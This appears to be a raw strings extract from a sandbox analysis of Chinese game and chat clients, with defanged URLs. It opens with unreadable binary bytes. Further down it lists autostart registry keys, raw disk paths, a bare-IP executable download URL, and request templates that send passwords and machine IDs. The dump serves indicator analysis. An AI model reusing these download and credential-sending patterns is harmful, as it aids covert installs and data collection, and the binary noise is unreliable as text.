ACCBDEONPCHI8=>:@@V[\RSW5=T6?`UagFKLLQT\a`JUk4=iKXn=@E:?>IKKNRSEKJ213/11EDFQSSHLMQRPPUXFLc-5]FLcRWXSXWMOP;?@5869;;:111=?@&$$#"$>@A...///444333999888... 555666 ???DDD333///===&&&888;;;FFF666 IIIGGG! "%''IKLDCEGGGNOM:::'&($$$-.,)&('%îE)'&&$$!## %$&$#@@@QRP342244OKPFGK!#$"'&NNNLKMOMM=AAA#%% %$'''$&&"'& %$%%%"""'*(&((#%% %$$)(!&%$&%%!!%'(#%&*,-*/.$)().,',*!$"%''&&&"""#%%( )) /34156.34489).- 0//47)./&* %''%%%*.3& *!%&
5"),-21,2-5:8
,6=.01'*.(**( )%)*
#!-//(,-6;9
#1022 --"!%
/33,./*,, ""3%.Tn|zert'0U!=)./*,,...;;;444777"""222888(((%%%"""$$$)))///... 999...111###...)))$$$!!!000DFGKMMHMLGIILOMRVWVXYUX\RXWRTU;==:BCKPO4977=;@?:?>?DCLQPLQPOTSQQQ489)/./11III?@ -->CBIII=B@DIH>&((%%%KKK>>>BBB&&&134FFFJLL3876;9QPR>CAMMMCHFY\ZACC(-,MMM:@A,,,HFFFHH*,, -.IGG 666BBB888MJE(')(**657?=??( )644>=?165@ED$#%&&&HHH879#"$()'$(#777)))'''''' --JLMMLN111HHHCEELNO$'%DGE????PMOKKKOLN#$( #!IGGJLM546120MOO???######"""$$$&&&DDD&&&'&(...$$$&((:;9OPNDFFEDFLLL&&&!!!HHHHHH,,,666FFF;;;888&&&===///444DDD@@@ 666666 ...999999333555000...999444@@@RRRNNNNNN]]]TSUVTT@EC)(*=;:LNN435ZUW ))666EFD&'%%''@@@LLLGJN,,,.,,888444()'()':::333PPPCCC'$&KIILLLHGI675JJJDFFVWU;99)(*WWWHHH326DECPNN,,,:::KKKPPPKKK,,,***LLLSUUSQQQONUUU555, /,*)#%%>>>QQQFFFIII,,,&&&%%%...DDDNNN333...>>>:::...,,,333666222666@@@444555:::JJJ#!!.,,'#""""%%% *,! %%%)$%% "###$$$-'(>$""#! (&&(%'"!#'''*('/ */* 644644)%$*&%&&&$#%'%%0 *.)(0 , &'.,,422)))"#!)%$,$$.&&(&%'#",$%'"#.)*,'(*((533666%%%*$%)$#(%! '& &'#!%"$ &'/*)1-,0 ,501501(&&&! )%$'"#,'(*%$$!%##($#1, 4/.,('0, /--*('.*)]]])$!%#"&$#.)()$#!%##)%$,'&-('/*))%$&$$)))---%%%"""$$$,(''"!&! ##&! %! ($#'!"#!!% !&!")$%&"!'#"'#"#)$#'#")$#)$#$'#",&'% !"643777>>>---&&&...,,,8222***$$$'''000,,,---///&&,%%% )))"""2/43\\\???..."""%%%$$$### '&( 037867688:;0310239:8109; !;356>?;...- ., 231888./-310&&&* /317;<:>9<:><::>@(&&!)245:87453!##$$$)(*./-0/1/1'''$$$###""")(*555333746?=>@ !:302BBB897$#u5CCC#"$!" -...BBB?@>#"$@?A:::231---AAA866- *')???=??===HEGA@B498:333111?>@***)))000)))---...MMMQQQAAA555999((( ))777///(((;;;79:9;;?==?NPPWWW/-- (* CCCDBB!!!)))///$$$)))999---555 %%ÌC???HHH444777@@@NNNHHHKKKFFFVVVIIIZZZVVVOOOEEERRRMMMAAA...[[[UUU...___ZZZbbb```ccc000111444---///GGG```[[[...lllgggUUULLLKKKQQQUUUAAAXXX\\\]]]bbb222eee777333ccc:::ZZZ]]]999NNNYYYYYYLLL}}}YYY___pppUUUnnn333)%$740*%&"""$$$###$$$&&&***)))$$$'''---"""((($$$###%&3-.5. 8/,7233./$&('', (-,,01&* ' ,(-,& *%*)$)("'%%!!"#!"#!!"... "$$(** 0/%*)"$$$&&$&&%''!"$%"%##&$$)($)((* %)**,,%*) ""#('#('')) "##'(#"!" #&$ """#*./' ,,10*,,$&&) ,*,-#%&#$(-.',-*# 8142).-'.1,4;0165 --"$$7167(-,&(() >@@8@@,.. --577(((&((#%% --""'))387%%% )))$$$[[[???...((($$$"""$$$$#644BBBFFF'%ìB#%h9FFFKHJJMK/.0///DHIEGGKMMLKOGLJ@>>PPPDBADCEKII&'%!##NOM999%&*EGG#%&)-.253" $#%$""!!!"$ÎE$$$'"#(') /0KHJJIKDDD134311CDB)))***000))),,,(((:::9:8:::@=?'(&'%F6FHHKKKBAC111!" KIH689, -GIJCA@ "#,**FFFIHD@BC@=?879IGGGED --022CCC=;;444324%&$***546<:9421>1(1,101415%6X62$2(2,2029 9$9(9,90949894 4(40484@4ekernel32.dllmscoree.dllKERNEL32.DLLhXXp://kf.37.com/hXXp://dts.37.comhXXp://bbs.37.com/index.php?gid=2447wd_returnlogin=1Software\Microsoft\Windows\CurrentVersion\Run"%s" %shXXp://dts.37.com/gonglue/ErrorUrlhXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1hXXp://d.wanyouxi7.com/37/dts/official/app.inihXXp://d.wanyouxi7.com/37/dts/official/Setup_37dts.exe%Y-%m-%d %H:%M:%S%Y%m%d%H%M%Srefer=%s&uid=%s&version=%d&installtime=%s&runcount=%d&curtime=%s&showlogintype=3hXXp://pay.37.com/select.php?gamename=dts&gameserver=%s&username=%siconAnimate.exe@HKEY_CURRENT_CONFIGHKEY_DYN_DATAHKEY_PERFORMANCE_DATAHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CLASSES_ROOTAAdvapi32.dllLastUpgrade.ini37LanderUpgrade.exeLander.iniBHTTPDownloaderContent-Type: application/x-www-form-urlencoded; charset=UTF-8;System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%s\Connection
XXXXXX
QQmenu.exe
Txwu.exe
2006.exe
connetbar.exe
wbc.exe
sunflowerTools.exe
LBSserver.exe
TLnbLdr.exe
DeepinStatus.exe
\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
\SOFTWARE\TyDyy.com
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d
InstallStat.tmp
ActiveStat.tmp
%Y-%m-%d
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d&position=%d&ext_7=%s
UninstallStat.tmp
X-X-X-X
\\.\IDE21201.VXD
\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe
3.0.0.0
3, 0, 0, 0iexplore.exe_1768:
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.fg>7?_____ZZSSH%)z.UUUUUUUU,....Qym````2```{.QLQIIIKGKGKGKGKGKG;33;33;088888808887080browseui.dllshdocvw.dll6.00.2900.5512 (xpsp.080413-2105)WindowsOperating System6.00.2900.55129158.exe_2088:.text`.rdata@.data.rsrcN SShSSh0'@ SSh`F SShySSSh\O SShW SShH SSh@ SShUSSSSSSShF SSh(3-!0,1'8"5.*2$unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll1.1.4inflate 1.1.4 Copyright 1995-2002 Mark AdlerVERSION.dllHttpQueryInfoAInternetOpenUrlAWININET.dll?IsControlHaveSkin@CAppSysOperation@@UAEHXZ?CleanBitmapMem@CAppSysOperation@@UAEHXZ?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z?CleanSkin@CAppSysOperation@@UAEHPAX@Z?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z?CleanUp@CAppSysOperation@@UAEXXZ?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z?LoadSkin@CAppSysOperation@@UAEHPAX@Z?FitBitmapSize@CAppSysOperation@@UAEXXZ?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B?GetBitmapHeight@CAppSysOperation@@QAEHXZ?GetBitmapWidth@CAppSysOperation@@QAEHXZ?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZMVUILib.dllMSIMG32.dllMFC42.DLLMSVCRT.dll_acmdlnWinExecGetCPInfoGetWindowsDirectoryAKERNEL32.dllUSER32.dllGDI32.dllRegCloseKeyRegOpenKeyExARegCreateKeyExAADVAPI32.dllShellExecuteASHELL32.dllCOMCTL32.dllole32.dllOLEPRO32.DLLOLEAUT32.dllWSOCK32.dllMSVCP60.dllGdiplusShutdowngdiplus.dllpublictool.dllIdleTrac.dll?WbBase_Login@CWeiboModule@@QAEHHPBD0@Z?WB_RelationOperation@CWeiboModule@@QAEH_J00HHH@ZCWeiboClient.dllNETAPI32.dllSHLWAPI.dllWINMM.dllpdh.dll9158.exe?GetPassword@CRoomInfo@@QAE?AVCString@@XZ?GetPort@CRoomInfo@@QAEHXZ?SetPassword@CRoomInfo@@QAEXPBD@Z?SetPort@CRoomInfo@@QAEXH@ZItemList/Item[ItemName = '%s']/ItemTextItemList/Item[ItemID = %d]/ItemTextIDispatch error #%dFSkinRes\HollSplitter.bmpSkinRes\VIPRoomSkin\row.bmp%s\%s%s9158.exechatQK.xmlSkinRes\unlock.bmpdance_room/dance_coffer.aspxuseridx=%s&userpass=%s&type=1doid=%d&fromid=%d&stepid=%dm_lpNormal->CopyHoleDC(%d, 0, %d, %d)m_lpActive->CopyHoleDC(0, 0, %d, %d)%e rcRect(%d,%d,%d,%d)CBmpProgCtrl..........................................%f*%d = %d//player.iniOnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"OnDocumentComplete: URL="%s"OnProgressChange: progress=%d, progress_max=%dOnNavigationComplete2: URL="%s"OnStatusTextChange: text="%s"OnTitleChange: text="%s"\SkinRes\fragment.bmpactive.ini.PAVCInternetException@@itemboxconfig.xmlfaceconfig.xmlitemconfig.xml\Fruit\fruit.xmlBanner.xmlfilter.zipserverlist.txtcar.xmlflower.xml%s,%ld,%d,%d,%d,%d,%sDownLoad.exe\SkinRes\waring.bmphXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg%s(%d)User32.DLLSkinRes/DriftingHorn.png%s&userid=%s&type=%d\tui_AD.ini\logincount.iniUserLoginToOpenUrlGotoWebUrlOnWebMessageBoxMsgEnterRoomAppOpenUrlLoginErrorRoomPassAdUser//weibo.inidiv.img50 img { max-width:60px; max-height:60px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));SkinRes\spinbtn_leftright.bmpSkinRes\flashTab.bmpSkinRes\flashTabDown.bmp%d/%dSkinRes\MoneyTip.bmp%Y-%m-%d %H:%M:%S %W-%A%s\*.*DynamicEffects\LightSticks.dbDynamicEffects\CaiShenImages.dbDynamicEffects\FireworksImages.db\DynamicEffects.zipDynamicEffects\DynamicEffects.zip\\.\PhysicalDrive%d\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
help.xml
sysmessage.xml
skinres\TG\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
VideoOut30.ocx
VideoIn30.ocx
9158KTVAudioOut.ocx
9158KTVAudioIn.ocx
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:%s^|$|^%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
lobby.ini
skinres\skin.ini
//HallClose.ini
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
%s?url=%s
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
/active/userinfor/userview_up.aspx?useridx=%s|viewid=%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LoginCount
LastLoginType
SOFTWARE\9158web
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
%s
%d
%s %s%s%d
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content:
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
.Marquee{ height:16px; overflow:hidden;}
.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}
active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
%s%H:%M:%S%s\%s.loghXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%shXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktvhXXp://room.9158.com/ktv_new/free_mic.aspx?userid=hXXp://room.9158.com/ktv_new/song_in.aspx?userid=&r=%ddance_room_new/click_save.aspxhXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%shXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d9158.comtiao58.comSOFTWARE\t58web&userid=%s&intype=2&type=%s&type=%s//skinres//MoneyRestPass.bmp'>#sel1##p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'">#p2#
#p1#
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s%s-%s|HistoryRoom.xmlhXXp://room.9158.com/ktv_new/lately_room.aspx?r=hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next 'href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '')){window.external.OnHistory_Showinfo(4,#pa#);}"\skinres\fav\sel1.gif' style='border:none;'>hXXp://room.9158.com/images/newten/go-home.gif#purl#hXXp://room.9158.com/ktv_new/head1.jpgclass='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"\skinres\fav\sel2.gif' style='border:none;'>iexplore.exehXXp://cugame.9158.com/active/app/load.htmlogin=hXXp://VVV.9158.com/client/login/loginback.aspx?skinres\RankRate.bmpskinres\Hall\SearchRoomTopRight.bmpskinres\Hall\SearchRoomTopLeft.bmpskinres\Unknown.jpgskinres\scroll.bmp\Game\ddvGame.iniSkinRes//none.bmpSkinRes\TreeStatus.bmpSkinRes\Hall\searchRoombtn.bmpSkinRes\Hall\headbutton.bmpSkinRes\Hall\MiniInfor.bmpSkinRes\Hall\bag.bmpSkinRes\systemCenter.bmpSkinRes\set.bmpSkinRes\mybank.bmpSkinRes\vip.bmpSkinRes\systemSet.bmpSkinRes\systemReg.bmp\SkinRes\IMToolBar.bmpHead\era.bmpHead\crown.bmpHead\topestpurple2.bmpHead\topestpurple.bmpHead\DiamondPurple2.bmpHead\DiamondPurple.bmpHead\queenPurple2.bmpHead\queenPurple.bmpHead\Purple2.bmpHead\Purple.bmpHead\purplevip2.bmpHead\purplevip.bmpHead\level15.bmpHead\redvip.bmpHead\0_bluevip.bmpHead\paliesman.bmponclick="window.external.OnclickHead('1')">hXXp://Head\user_photo.bmpHead\H5_2.bmpHead\H5_1.bmpHead\H4_2.bmpHead\H4_1.bmpHead\H3_2.bmpHead\H3_1.bmpHead\H2_2.bmpHead\H2_1.bmpHead\H1_2.bmpHead\H1_1.bmpHead\H0_2.bmpHead\H0_1.bmp-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"%Y%m%d%s\%d\%sSkinRes\BtnMinInfor.bmpSkinRes\BtnCloseInfor.bmp%s&uidx=%sSkinRes\brInfor.bmpSkinRes\blInfor.bmpSkinRes\trInfor.bmpSkinRes\tlInfor.bmp%s %s%d||%d||%d||%s.img50 { width:50px; height:50px; text-align:center; }div.img50 img { max-width:50px; max-height:50px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
' target='_blank' onFocus='this.blur()'>\guestlogin.iniSkinRes\TG\QRCode.bmpSkinRes\TG\mins1.bmpSkinRes\TG\closes1.bmpLogin_GuestHall_LoginCancelHall_LoginOKHallLoginRegLogin_WeiboLogin_AlipayLogin_QQLogin_idxLogin_UserGuestLogin_TuiGetLoginNodeData.aspxdl.week8.netplatname=%s&userid=%s&loginip=%s&loginport=%d/Error.txtCLoginDlg m_nLoginType!=nTypehXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspxSysMsgCloseBtnskinres\login.gifhXXp://VVV.9158.com/?code=SkinRes/IeClose.png%H : %M %Y/%m/%dnIDKeyMsgCloseBtnceleburltaurlrelogingourlSockClient.dllMulti*.dll.PAVCObject@@.PAVCException@@.PAVCFileException@@%sBugReport.exe ,%sFlags:XDS:X ES:X FS:X GS:XSS:ESP:X:X EBP:XCS:EIP:X:XEAX:XEBX:XECX:XEDX:XESI:XEDI:XFault address1: X X:X %sException code1: X %s//build4.5%d-%d-%d %d:%d:%d***************************************************NTDLL.DLLFLT_INVALID_OPERATIONFLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmin.bmp
SkinRes\buttonclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&psw=%s&useridx=%s
%s&r=%d
{6C9A41B3-ABB2-45f7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\phone.bmp
SkinRes\lock.bmp
SkinRes\key2.bmp
SkinRes\key1.bmp
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://pay.9158.com/v/ips/NetPay_vip.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
%s
/active/userinfor/get_userview.aspx?useridx=%s&r=%d
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');SkinRes\X2.bmphXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=